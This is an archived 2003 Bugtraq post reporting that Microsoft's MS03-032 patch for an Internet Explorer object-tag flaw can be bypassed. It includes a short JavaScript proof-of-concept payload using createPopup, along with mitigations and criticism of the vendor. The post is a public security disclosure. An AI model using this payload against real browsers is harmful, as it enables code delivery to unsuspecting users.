Bugtraq mailing list archives
BAD NEWS: Microsoft Security Bulletin MS03-032
From: "http-equiv () excite com" <1 () malware com>
Date: Sun, 7 Sep 2003 13:16:18 -0000
Since the cat somehow got out of the bag, and more importantly, this is so blatantly obvious, herewith is the "Bad News": The patch for Drew's object data=funky.hta doesn't work: http://www.malware.com/badnews.html <script> var oPopup = window.createPopup(); function showPopup() { oPopup.document.body.innerHTML = "<object data=ouch.php>"; oPopup.show(0,0,1,1,document.body); } showPopup() </script> Notes: 1. Disable Active Scripting 2. In case that does not work, uninstall Internet Explorer 3. http://www.eeye.com/html/Research/Advisories/AD20030820.html 4. This was sent to the manufacturer quite some time prior to this going out. Surprisingly no immediate acknowledgement 5. This is so blatantly obvious, in particular because it is the coupling of two known issues[one current + one from 2002]: http://www.securityfocus.com/bid/3867/ It is beyond comprehension why this was not checked from the outset as it is a known issue plus file://::{CLSID}in the control panel in the object tag still functions to date. 6. At this stage one must really question the compentency of this particular operation. This is a pathetic oversight. -- http://www.malware.com
Current thread:
- BAD NEWS: Microsoft Security Bulletin MS03-032 http-equiv () excite com (Sep 08)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 GreyMagic Software (Sep 08)
- Re: BAD NEWS: Microsoft Security Bulletin MS03-032 another temporary solution Igor Franchuk (Sep 10)
- <Possible follow-ups>
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 ADBecker (Sep 08)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Drew Copley (Sep 08)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Nathan Wallwork (Sep 10)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Drew Copley (Sep 10)
- Re: BAD NEWS: Microsoft Security Bulletin MS03-032 Crist J. Clark (Sep 12)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Drew Copley (Sep 08)
- Re: [Full-Disclosure] RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Nick FitzGerald (Sep 09)